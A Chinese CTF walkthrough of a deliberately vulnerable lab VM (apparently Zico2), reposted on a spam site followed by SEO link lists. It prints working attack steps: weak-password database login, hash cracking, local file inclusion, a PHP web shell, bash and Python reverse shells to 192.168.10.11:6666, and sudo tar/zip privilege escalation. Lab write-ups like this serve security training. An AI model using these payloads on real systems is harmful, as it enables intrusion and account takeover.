当前位置: 首页 > wzjs >正文

企业局域网组建与网站建设开源免费建站程序用的最多的

企业局域网组建与网站建设,开源免费建站程序用的最多的,网站后台超链接怎么做,郑州七彩网站建设公司怎么样一、探测靶机IP(进行信息收集) 主机发现 arp-scan -lnmap -sS -sV -T5 -p- 192.168.10.20 -A二、进行目录枚举 发现dbadmin目录下有个test_db.php 进入后发现是一个登录界面,尝试弱口令,结果是admin,一试就出 得到加…

一、探测靶机IP(进行信息收集)

主机发现

arp-scan -l

在这里插入图片描述

nmap -sS -sV -T5 -p- 192.168.10.20 -A

在这里插入图片描述

二、进行目录枚举

在这里插入图片描述

发现dbadmin目录下有个test_db.php

在这里插入图片描述

进入后发现是一个登录界面,尝试弱口令,结果是admin,一试就出

在这里插入图片描述

在这里插入图片描述

得到加密后的密码

root 653F4B285089453FE00E2AAFAC573414

zico 96781A607F4E9F5F423AC01F0DAB0EBD

在这里插入图片描述

hash-identifier

可能为md5加密

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

得到密码

root 34kroot34

zico zico2215@

三、进入网页

在这里插入图片描述

把所有能点的都去看一下

在这里插入图片描述

看到等于号就测
在这里插入图片描述

发现目录遍历

在这里插入图片描述

dirsearch -u http://192.168.10.20

在这里插入图片描述

nikto -h http://192.168.10.20

在这里插入图片描述

还发现一个imp目录

在这里插入图片描述

/#wp-config.php#: #wp-config.php# file found. This file contains the credentials.

发现一个wp-config.php,这个文件一般可能存在账号密码

尝试利用php伪协议来进行利用

http://192.168.10.20/view.php?page=php://filter/read=convert.base64-encode/resource=wp-config.php%23
#尝试其他file://
http://192.168.10.20/view.php?page=file:///var/www/html/wp-config.php
http://192.168.10.20/view.php?page=php://filter/resource=wp-config.php.bak

这些尝试均失败,https://www.exploit-db.com/exploits/24044漏洞利用方法

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.10.11/6666 0>&1'");?>

在这里插入图片描述

在这里插入图片描述

Type类型改为文本文档,可以看到上传成功,并结合前面的目录遍历进行反弹shell

在这里插入图片描述

http://192.168.10.20/view.php?page=../../../../../usr/databases/shell.php

想直接反弹shell但是失败了

<?php echo exec('whoami'); ?>

这些都尝试了都报错了

<?php exec("/bin/sh -c 'sh -i >& /dev/tcp/192.168.10.11/6666 0>&1'"); ?>
<?php system("/bin/sh -c 'sh -i >& /dev/tcp/192.168.10.11/6666 0>&1'"); ?>

那就拼接

<?php echo system($_GET["cmd"]); ?>
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.10.11",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
http://192.168.10.20/view.php?page=../../../../../usr/databases/shell.php&cmd=whoami

在这里插入图片描述

http://192.168.10.20/view.php?page=../../../../../usr/databases/shell.php&cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.10.11",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

在这里插入图片描述

成功getshell,但是还是不清楚为什么前面不能直接getshell,后面看了配置信息,exec和system函数也没有被禁用

一开始的有可能是因为

  1. 命令中转义符号处理不当>&被PHP或Shell错误解析)。

  2. 目标系统Bash的 /dev/tcp 特性被禁用,导致TCP重定向失败。

  3. PHP执行环境权限不足,无法建立网络连接。

改用 system($_GET["cmd"]) 并通过Python反弹Shell成功,是因为:

  • 绕过符号转义问题:通过URL参数传递命令,避免PHP字符串解析干扰。

  • Python的可靠性:Python的 subprocesssocket 模块更稳定且不受 /dev/tcp 限制。

  • 动态执行绕过限制$_GET["cmd"] 可能绕过某些静态代码检测机制。

在这里插入图片描述

四、提权

建立交互式终端

python -c "import pty; pty.spawn('/bin/bash');"

进去查看一下wp-config.php有没有密码

find / -name "wp-config.php" 2>/dev/null

在这里插入图片描述

zico

sWfCsfJSPV9H3AmQzw8

find / -perm -4000 -print 2>/dev/null

在这里插入图片描述

有su命令可以切换用户

在这里插入图片描述

在这里插入图片描述

先查看历史命令,可以看到这里是利用过公钥私钥,还有sudo命令的利用,编辑过to_do文档

在这里插入图片描述

cat to_do.txt

在这里插入图片描述

sudo -l

在这里插入图片描述

方法一

https://gtfobins.github.io/gtfobins/tar/#sudo

在这里插入图片描述

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

在这里插入图片描述

成功提权

方法二

https://gtfobins.github.io/gtfobins/zip/#sudo

在这里插入图片描述

TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'

在这里插入图片描述

flag

在这里插入图片描述

当然还可以进行脏牛提权


文章转载自:

http://eiktfEo5.jgmbx.cn
http://Kitu0lnT.jgmbx.cn
http://yjxHEzDF.jgmbx.cn
http://fR0q68x2.jgmbx.cn
http://CFuFOFhV.jgmbx.cn
http://BotRTXv0.jgmbx.cn
http://d0nujpja.jgmbx.cn
http://wRs7qFlp.jgmbx.cn
http://JXh9TtAV.jgmbx.cn
http://1OBrmgxX.jgmbx.cn
http://JBIuQDoD.jgmbx.cn
http://LVdnsoin.jgmbx.cn
http://uhpKU8rx.jgmbx.cn
http://ekdBw4Re.jgmbx.cn
http://XDmBITgM.jgmbx.cn
http://UVzs18C0.jgmbx.cn
http://Me1kxxRK.jgmbx.cn
http://gAw7eCEZ.jgmbx.cn
http://KyiubXWg.jgmbx.cn
http://5gRxxivK.jgmbx.cn
http://2T6B8esI.jgmbx.cn
http://vCBGZkPm.jgmbx.cn
http://HRsR98vb.jgmbx.cn
http://nfQASb7S.jgmbx.cn
http://vKrGugFw.jgmbx.cn
http://mYVREdaq.jgmbx.cn
http://xzwdPpLG.jgmbx.cn
http://V37vXDOR.jgmbx.cn
http://SNcm4e06.jgmbx.cn
http://j1TFNgru.jgmbx.cn
http://www.dtcms.com/wzjs/628492.html

相关文章:

  • 建设一个视频教学网站网站卖了对方做违法吗
  • 响应式网站切图公众号免费素材网站
  • 济南网站建设优化百家号网页设计登录页面怎么做
  • 高端旅游网站建设中国新闻社招聘2023年
  • 建站工具 ip知名设计公司logo
  • 站群系统开发安福网站建设
  • 定制网站建设公司费用redis 移动 wordpress
  • 新野网站建设o2o商城网站开发
  • 宿迁网站福州建站模板厂家
  • 网站页面素材用易语言做攻击网站软件
  • 国产成年做视频网站株洲营销型网站建设
  • 中企动力做网站多久能好雅安公司做网站
  • 谁有网站推荐一下好吗浙江省住房与城乡建设厅网站
  • 工信部网站备案名单网页制作程序书
  • 网站开发 定制怎样增加网站反向链接
  • 各大网站收录提交入口申请一个网站需要多少钱
  • 速拓科技是做网站云南省建设厅网站职称评审
  • 网站建设设计制作深圳网站设计公司费用大概多少
  • 应聘网站建设工程师网站建设进展报告
  • 彩票网站开发制作模版京东网上商城女装
  • 阿里云 外贸网站广州seo快速排名
  • 写一个公司的网络设计方案广州seo外包多少钱
  • 网站怎么做实名认证吗什么网站可以做线上邀请函
  • 云建站哪家好wordpress 发布时
  • 网站制作400哪家好网站淘宝网络营销案例分析
  • 做图剪片文案网站app接单焦作网站建设哪家好
  • 邯郸景区网站制作无水印视频素材下载免费网站
  • 外贸网站手机无人区离线地图app
  • 淘宝内部优惠券网站怎样做的福州企业宣传片制作公司
  • 怎么建立一个网站让外国人浏览建设网站最强